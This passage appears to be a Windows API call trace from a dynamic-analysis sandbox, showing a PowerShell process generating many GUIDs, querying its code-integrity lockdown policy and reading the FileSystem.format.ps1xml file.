	[0044.680] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xaa5ed9ea, Data2=0xca40, Data3=0x4c92, Data4=([0]=0xb2, [1]=0x68, [2]=0x92, [3]=0x9c, [4]=0xed, [5]=0x69, [6]=0x91, [7]=0x93))) returned 0x0
	[0044.680] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2bb6ee09, Data2=0xfaf6, Data3=0x425a, Data4=([0]=0xa2, [1]=0xdc, [2]=0x58, [3]=0x68, [4]=0x1b, [5]=0x35, [6]=0x30, [7]=0x60))) returned 0x0
	[0044.680] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf8116500, Data2=0x5085, Data3=0x45cf, Data4=([0]=0xac, [1]=0x38, [2]=0xf1, [3]=0x2e, [4]=0x5b, [5]=0x38, [6]=0xac, [7]=0x4b))) returned 0x0
	[0044.680] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3e511204, Data2=0x2fa4, Data3=0x41ec, Data4=([0]=0xb8, [1]=0x3, [2]=0x2, [3]=0x6c, [4]=0xe4, [5]=0xef, [6]=0x6c, [7]=0x84))) returned 0x0
	[0044.680] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd8e3770b, Data2=0x37f, Data3=0x4861, Data4=([0]=0xb9, [1]=0xf5, [2]=0x1a, [3]=0xce, [4]=0xd3, [5]=0xaa, [6]=0xd9, [7]=0xc))) returned 0x0
	[0044.681] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6c4515c7, Data2=0x5f24, Data3=0x49ed, Data4=([0]=0x81, [1]=0xb8, [2]=0xf9, [3]=0x71, [4]=0x62, [5]=0x3c, [6]=0x7b, [7]=0x38))) returned 0x0
	[0044.681] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf442097d, Data2=0x6a7e, Data3=0x43ab, Data4=([0]=0xbf, [1]=0x6f, [2]=0x20, [3]=0xbe, [4]=0x37, [5]=0xe7, [6]=0x9b, [7]=0x36))) returned 0x0
	[0044.681] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb78463f0, Data2=0x4a3a, Data3=0x4882, Data4=([0]=0x93, [1]=0x22, [2]=0x1f, [3]=0x27, [4]=0xd3, [5]=0x85, [6]=0x14, [7]=0x1))) returned 0x0
	[0044.681] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x70a29a0b, Data2=0x99b6, Data3=0x494a, Data4=([0]=0x9b, [1]=0x42, [2]=0xff, [3]=0xa5, [4]=0xd, [5]=0x69, [6]=0x24, [7]=0xfd))) returned 0x0
	[0044.682] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x7fb02fbc, Data2=0x23d4, Data3=0x4bbd, Data4=([0]=0xa2, [1]=0x83, [2]=0xd6, [3]=0x50, [4]=0x18, [5]=0xed, [6]=0x9b, [7]=0xf8))) returned 0x0
	[0044.682] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc7ed6ea, Data2=0xaa46, Data3=0x4033, Data4=([0]=0xb9, [1]=0x74, [2]=0xb4, [3]=0xfa, [4]=0x4d, [5]=0x9c, [6]=0x6c, [7]=0x80))) returned 0x0
	[0044.682] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1bd3b68d, Data2=0x60da, Data3=0x4deb, Data4=([0]=0x9e, [1]=0xa4, [2]=0x65, [3]=0x73, [4]=0xa, [5]=0xe3, [6]=0xea, [7]=0x3f))) returned 0x0
	[0044.682] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6eb07db1, Data2=0xafdf, Data3=0x499b, Data4=([0]=0x8e, [1]=0x2f, [2]=0x8e, [3]=0x82, [4]=0x86, [5]=0xbd, [6]=0x4b, [7]=0x49))) returned 0x0
	[0044.683] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x4cd36a4b, Data2=0x3c8a, Data3=0x4273, Data4=([0]=0x9d, [1]=0x93, [2]=0xd0, [3]=0x68, [4]=0x88, [5]=0x6f, [6]=0x9e, [7]=0x60))) returned 0x0
	[0044.683] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3df7bcb2, Data2=0x2443, Data3=0x4bab, Data4=([0]=0x87, [1]=0x7f, [2]=0xd5, [3]=0x59, [4]=0x24, [5]=0xaf, [6]=0x70, [7]=0x2))) returned 0x0
	[0044.683] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x4c22263, Data2=0x1f56, Data3=0x473d, Data4=([0]=0x90, [1]=0x75, [2]=0xa, [3]=0x8f, [4]=0x45, [5]=0x75, [6]=0xf9, [7]=0xd3))) returned 0x0
	[0044.683] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf47b3b07, Data2=0xa7f6, Data3=0x41c7, Data4=([0]=0xb4, [1]=0x88, [2]=0x59, [3]=0xbc, [4]=0xbc, [5]=0x30, [6]=0x60, [7]=0xd1))) returned 0x0
	[0044.683] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9a3f812a, Data2=0x5b15, Data3=0x4869, Data4=([0]=0x97, [1]=0x1e, [2]=0xa1, [3]=0x34, [4]=0x4a, [5]=0x3e, [6]=0xe7, [7]=0x4c))) returned 0x0
	[0044.684] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x33677422, Data2=0xfc32, Data3=0x43f6, Data4=([0]=0x9a, [1]=0x34, [2]=0x2d, [3]=0xce, [4]=0xe9, [5]=0x71, [6]=0x70, [7]=0x16))) returned 0x0
	[0044.684] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x277e0f9a, Data2=0x1b73, Data3=0x4701, Data4=([0]=0xa1, [1]=0x6a, [2]=0x9d, [3]=0x73, [4]=0xfd, [5]=0x21, [6]=0xb9, [7]=0x75))) returned 0x0
	[0044.684] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x177acab7, Data2=0x47d6, Data3=0x42c3, Data4=([0]=0x84, [1]=0x80, [2]=0x72, [3]=0xcf, [4]=0xe8, [5]=0x7c, [6]=0x6a, [7]=0x88))) returned 0x0
	[0044.684] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6b581e27, Data2=0xb9d3, Data3=0x419a, Data4=([0]=0x95, [1]=0xd5, [2]=0x97, [3]=0xe7, [4]=0x6c, [5]=0xa, [6]=0xf4, [7]=0x7f))) returned 0x0
	[0044.684] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x19f32b0a, Data2=0xbc12, Data3=0x4478, Data4=([0]=0xa5, [1]=0xda, [2]=0x2c, [3]=0xc9, [4]=0xbf, [5]=0xfe, [6]=0x2, [7]=0x2d))) returned 0x0
	[0044.685] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8f436e90, Data2=0xc64f, Data3=0x4868, Data4=([0]=0xa6, [1]=0xce, [2]=0x4b, [3]=0x66, [4]=0x6b, [5]=0x93, [6]=0x61, [7]=0xf1))) returned 0x0
	[0044.685] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6c0d7c46, Data2=0xd743, Data3=0x4783, Data4=([0]=0x91, [1]=0x10, [2]=0x54, [3]=0x78, [4]=0x9, [5]=0xc2, [6]=0x7e, [7]=0xa))) returned 0x0
	[0044.685] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x31957415, Data2=0x9767, Data3=0x428c, Data4=([0]=0xa4, [1]=0x55, [2]=0x5f, [3]=0xab, [4]=0x59, [5]=0xd3, [6]=0xe1, [7]=0x26))) returned 0x0
	[0044.685] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xade8df3b, Data2=0x5ecc, Data3=0x4888, Data4=([0]=0xaf, [1]=0x98, [2]=0xd6, [3]=0xa3, [4]=0x41, [5]=0xbb, [6]=0xf2, [7]=0xdc))) returned 0x0
	[0044.685] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x56566c56, Data2=0x668f, Data3=0x465f, Data4=([0]=0x87, [1]=0x16, [2]=0x44, [3]=0x4c, [4]=0xe0, [5]=0x1c, [6]=0x2f, [7]=0x9f))) returned 0x0
	[0044.686] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc6a8afd2, Data2=0xcc8a, Data3=0x4f66, Data4=([0]=0xaf, [1]=0x6f, [2]=0xcd, [3]=0x11, [4]=0x52, [5]=0x7f, [6]=0x9, [7]=0x2d))) returned 0x0
	[0044.686] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x898b5a82, Data2=0xbfc0, Data3=0x4acd, Data4=([0]=0x91, [1]=0x77, [2]=0x2, [3]=0x95, [4]=0x16, [5]=0xb3, [6]=0x49, [7]=0x63))) returned 0x0
	[0044.686] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa46f94f6, Data2=0x277, Data3=0x41ad, Data4=([0]=0xb7, [1]=0x94, [2]=0x26, [3]=0xc7, [4]=0x5e, [5]=0x67, [6]=0xb8, [7]=0xdc))) returned 0x0
	[0044.686] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5db28753, Data2=0x227, Data3=0x4fa6, Data4=([0]=0xbb, [1]=0x15, [2]=0x8d, [3]=0x84, [4]=0x89, [5]=0x67, [6]=0x57, [7]=0x86))) returned 0x0
	[0044.687] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x4a049905, Data2=0x49e1, Data3=0x404f, Data4=([0]=0x9e, [1]=0x25, [2]=0x2, [3]=0xc7, [4]=0xb7, [5]=0x5, [6]=0x9c, [7]=0x57))) returned 0x0
	[0044.687] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x968871a6, Data2=0x483d, Data3=0x4fc7, Data4=([0]=0xa1, [1]=0x60, [2]=0x61, [3]=0xd0, [4]=0xcf, [5]=0xe, [6]=0x3f, [7]=0x7e))) returned 0x0
	[0044.687] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x39eb4175, Data2=0x8341, Data3=0x410e, Data4=([0]=0xa6, [1]=0x13, [2]=0x7a, [3]=0x7c, [4]=0xcb, [5]=0x2d, [6]=0xcf, [7]=0x66))) returned 0x0
	[0044.687] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc43a5e31, Data2=0xbd3d, Data3=0x4740, Data4=([0]=0x91, [1]=0xb9, [2]=0x95, [3]=0xe8, [4]=0xb8, [5]=0xd0, [6]=0x2a, [7]=0x52))) returned 0x0
	[0044.687] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc6edd794, Data2=0xc691, Data3=0x4165, Data4=([0]=0x9a, [1]=0xd2, [2]=0x96, [3]=0xe4, [4]=0xd5, [5]=0xac, [6]=0x7d, [7]=0x9d))) returned 0x0
	[0044.688] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf41bae7a, Data2=0xa94c, Data3=0x4e5d, Data4=([0]=0xa1, [1]=0x6b, [2]=0x13, [3]=0x9, [4]=0x6f, [5]=0xe7, [6]=0xb6, [7]=0xde))) returned 0x0
	[0044.688] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6bd94a14, Data2=0xe629, Data3=0x4e3b, Data4=([0]=0x94, [1]=0x4, [2]=0x7e, [3]=0x21, [4]=0xc3, [5]=0x81, [6]=0xa4, [7]=0xa1))) returned 0x0
	[0044.688] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x940794db, Data2=0x98b1, Data3=0x4be1, Data4=([0]=0x9e, [1]=0x56, [2]=0x4b, [3]=0xd9, [4]=0xa4, [5]=0x90, [6]=0xce, [7]=0x3c))) returned 0x0
	[0044.688] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x220e2b8f, Data2=0x2991, Data3=0x419b, Data4=([0]=0xbc, [1]=0xa, [2]=0xf, [3]=0xc9, [4]=0x2d, [5]=0x61, [6]=0xb3, [7]=0xd2))) returned 0x0
	[0044.689] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x54d8d66d, Data2=0xf8d0, Data3=0x4374, Data4=([0]=0x89, [1]=0x7f, [2]=0x5d, [3]=0x28, [4]=0x61, [5]=0xa1, [6]=0x68, [7]=0xd1))) returned 0x0
	[0044.689] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9dbc56a1, Data2=0x343a, Data3=0x4f5b, Data4=([0]=0xa1, [1]=0xa, [2]=0x1d, [3]=0xfe, [4]=0xe1, [5]=0x10, [6]=0x1, [7]=0x62))) returned 0x0
	[0044.689] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3362fc7d, Data2=0xcbd, Data3=0x4b38, Data4=([0]=0xb7, [1]=0xe7, [2]=0xea, [3]=0xdc, [4]=0x6b, [5]=0x98, [6]=0xc7, [7]=0x2c))) returned 0x0
	[0044.689] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xbef6024f, Data2=0x1b2f, Data3=0x4b8b, Data4=([0]=0x84, [1]=0xc, [2]=0x4a, [3]=0xba, [4]=0x84, [5]=0x72, [6]=0xea, [7]=0xcf))) returned 0x0
	[0044.690] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x85813338, Data2=0x1a8e, Data3=0x41f2, Data4=([0]=0xaa, [1]=0x71, [2]=0xa6, [3]=0x9b, [4]=0x7a, [5]=0x8f, [6]=0x92, [7]=0x3c))) returned 0x0
	[0044.690] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8abc17d8, Data2=0x4848, Data3=0x46c9, Data4=([0]=0x87, [1]=0x2f, [2]=0xd, [3]=0x2f, [4]=0x6b, [5]=0x5, [6]=0xca, [7]=0x91))) returned 0x0
	[0044.690] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x30fbc94e, Data2=0x57de, Data3=0x41f5, Data4=([0]=0x90, [1]=0x9, [2]=0xbd, [3]=0xc, [4]=0x9, [5]=0x16, [6]=0x45, [7]=0x2d))) returned 0x0
	[0044.691] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb4c28c8e, Data2=0x4034, Data3=0x4cc5, Data4=([0]=0xa8, [1]=0x74, [2]=0x51, [3]=0xd8, [4]=0xb8, [5]=0xa4, [6]=0x97, [7]=0x85))) returned 0x0
	[0044.691] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x832d0e11, Data2=0x765b, Data3=0x4c6c, Data4=([0]=0x8f, [1]=0xcd, [2]=0x6d, [3]=0x65, [4]=0xd4, [5]=0x66, [6]=0x3b, [7]=0xfb))) returned 0x0
	[0044.691] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xabd236f, Data2=0xf518, Data3=0x498f, Data4=([0]=0xbe, [1]=0x87, [2]=0xa1, [3]=0x7f, [4]=0xce, [5]=0x47, [6]=0xaf, [7]=0x7))) returned 0x0
	[0044.691] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf57e641d, Data2=0x22e3, Data3=0x4875, Data4=([0]=0x88, [1]=0x45, [2]=0x39, [3]=0xda, [4]=0x4c, [5]=0x7, [6]=0xaa, [7]=0xfe))) returned 0x0
	[0044.692] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1bc72ef6, Data2=0x9c09, Data3=0x4fc2, Data4=([0]=0x95, [1]=0x56, [2]=0x39, [3]=0xc1, [4]=0xf0, [5]=0xed, [6]=0xab, [7]=0x83))) returned 0x0
	[0044.692] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc655cc6c, Data2=0x741e, Data3=0x40b2, Data4=([0]=0xa9, [1]=0x4c, [2]=0x31, [3]=0x59, [4]=0x9b, [5]=0x22, [6]=0xff, [7]=0x3b))) returned 0x0
	[0044.692] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6a84d3a8, Data2=0xff0e, Data3=0x40d7, Data4=([0]=0xb3, [1]=0x42, [2]=0x91, [3]=0x6e, [4]=0x8b, [5]=0x6e, [6]=0xaa, [7]=0x2d))) returned 0x0
	[0044.692] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xaa527217, Data2=0xa650, Data3=0x48a5, Data4=([0]=0xa5, [1]=0x2b, [2]=0x1e, [3]=0xa8, [4]=0x4, [5]=0xaf, [6]=0x75, [7]=0x21))) returned 0x0
	[0044.693] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5a38f8c1, Data2=0xbdbe, Data3=0x472b, Data4=([0]=0xb8, [1]=0x11, [2]=0x57, [3]=0x8a, [4]=0xda, [5]=0x1f, [6]=0x60, [7]=0x3))) returned 0x0
	[0044.693] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa761fd9d, Data2=0xd28c, Data3=0x4b45, Data4=([0]=0xbe, [1]=0xbb, [2]=0x37, [3]=0xfc, [4]=0xe8, [5]=0xed, [6]=0x39, [7]=0xa0))) returned 0x0
	[0044.693] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf0e59f5d, Data2=0x661d, Data3=0x4d47, Data4=([0]=0xb2, [1]=0xdf, [2]=0x8a, [3]=0x8d, [4]=0xd4, [5]=0xfb, [6]=0x11, [7]=0x62))) returned 0x0
	[0044.697] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9013f35a, Data2=0xc702, Data3=0x4c78, Data4=([0]=0x97, [1]=0x3f, [2]=0x30, [3]=0x38, [4]=0xf7, [5]=0x7c, [6]=0xe6, [7]=0x6b))) returned 0x0
	[0044.697] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x14481b9c, Data2=0xc946, Data3=0x49f2, Data4=([0]=0x87, [1]=0x62, [2]=0x43, [3]=0x1e, [4]=0x1f, [5]=0x59, [6]=0x79, [7]=0xb3))) returned 0x0
	[0044.697] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5f57d59e, Data2=0x46e7, Data3=0x47d5, Data4=([0]=0x95, [1]=0x95, [2]=0xd6, [3]=0xa0, [4]=0x7a, [5]=0x89, [6]=0xc3, [7]=0xae))) returned 0x0
	[0044.697] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf317e331, Data2=0x1709, Data3=0x47b6, Data4=([0]=0x9b, [1]=0x67, [2]=0x67, [3]=0xd, [4]=0x2a, [5]=0x85, [6]=0x26, [7]=0xc))) returned 0x0
	[0044.698] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9b38ed55, Data2=0x5d18, Data3=0x4811, Data4=([0]=0xb8, [1]=0xec, [2]=0x2f, [3]=0x9b, [4]=0xb6, [5]=0xe, [6]=0x24, [7]=0x3a))) returned 0x0
	[0044.698] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9b2e91c2, Data2=0x4379, Data3=0x4b11, Data4=([0]=0xaa, [1]=0x64, [2]=0x86, [3]=0xab, [4]=0xbe, [5]=0xf8, [6]=0xc5, [7]=0x86))) returned 0x0
	[0044.698] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9d309c22, Data2=0x3b0, Data3=0x49db, Data4=([0]=0xb9, [1]=0x39, [2]=0x1a, [3]=0x2f, [4]=0xe6, [5]=0xf, [6]=0x8b, [7]=0x49))) returned 0x0
	[0044.698] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc6066498, Data2=0x43bf, Data3=0x491f, Data4=([0]=0xae, [1]=0xe, [2]=0xe, [3]=0xb, [4]=0xd4, [5]=0x7b, [6]=0x79, [7]=0x4e))) returned 0x0
	[0044.698] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x89d6fb4, Data2=0xe0a5, Data3=0x46d0, Data4=([0]=0x9e, [1]=0xdf, [2]=0x5a, [3]=0x10, [4]=0x83, [5]=0x4a, [6]=0x81, [7]=0xb1))) returned 0x0
	[0044.706] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc3b36bb7, Data2=0xf2d, Data3=0x41fc, Data4=([0]=0x9c, [1]=0xb1, [2]=0x7b, [3]=0xf6, [4]=0x3e, [5]=0x2c, [6]=0x7a, [7]=0x2b))) returned 0x0
	[0044.706] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6fe8f78b, Data2=0x8de8, Data3=0x4d3d, Data4=([0]=0x85, [1]=0xc0, [2]=0xa, [3]=0xce, [4]=0xa5, [5]=0xe9, [6]=0xf4, [7]=0xf8))) returned 0x0
	[0044.706] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x90762b8c, Data2=0xc874, Data3=0x4e6f, Data4=([0]=0x99, [1]=0x69, [2]=0xfd, [3]=0xaf, [4]=0xdd, [5]=0x5, [6]=0x9c, [7]=0x32))) returned 0x0
	[0044.707] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9e7ee536, Data2=0xb102, Data3=0x4b49, Data4=([0]=0x93, [1]=0xdf, [2]=0x17, [3]=0x69, [4]=0x77, [5]=0x96, [6]=0xde, [7]=0xae))) returned 0x0
	[0044.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.707] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0044.707] GetSystemDirectoryW (in: lpBuffer=0x1505f3b9410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.707] CoTaskMemFree (pv=0x1505f3b9410) 
	[0044.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0044.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0044.707] WldpGetLockdownPolicy () returned 0x0
	[0044.707] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.707] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0044.708] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0044.708] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0044.708] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.708] GetFileType (hFile=0x3d8) returned 0x1
	[0044.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.708] GetFileType (hFile=0x3d8) returned 0x1
	[0044.708] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0044.708] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.709] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0044.709] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.709] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0044.709] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.710] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0044.710] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
